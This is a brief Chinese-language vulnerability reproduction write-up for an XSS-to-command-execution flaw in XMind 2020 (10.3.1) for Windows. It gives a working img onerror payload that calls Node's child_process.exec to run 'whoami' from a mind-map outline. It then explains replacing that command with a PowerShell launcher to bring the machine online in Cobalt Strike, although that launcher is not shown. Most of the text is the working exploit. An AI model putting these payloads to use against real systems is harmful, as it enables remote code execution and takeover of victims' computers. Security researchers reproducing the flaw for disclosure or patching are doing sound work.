漏洞复现-Xmind-xss致命令执行

 

 

 

0x00 实验环境

攻击机：Win 10

 

0x01 影响版本

官网windows最新版本：XMind-2020-for-Windows-64bit-10.3.1-202101070032

 

0x02 漏洞复现

（1）安装Xmind后，新建一个思维导图，然后点击大纲：

（2）尝试XSS语句测试payload：（windows版本，选中后点击ctrl即可触发弹框）

<img src=x onerror=alert(1)>

　

 

 

 （3）尝试使用xss进行命令执行：

<img src=x onerror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})">

　　

（4）上线CS，直接将whoami替换为powershell命令即可成功上线CS：

 

生成powershell上线命令即可上线CS：

 

成功上线：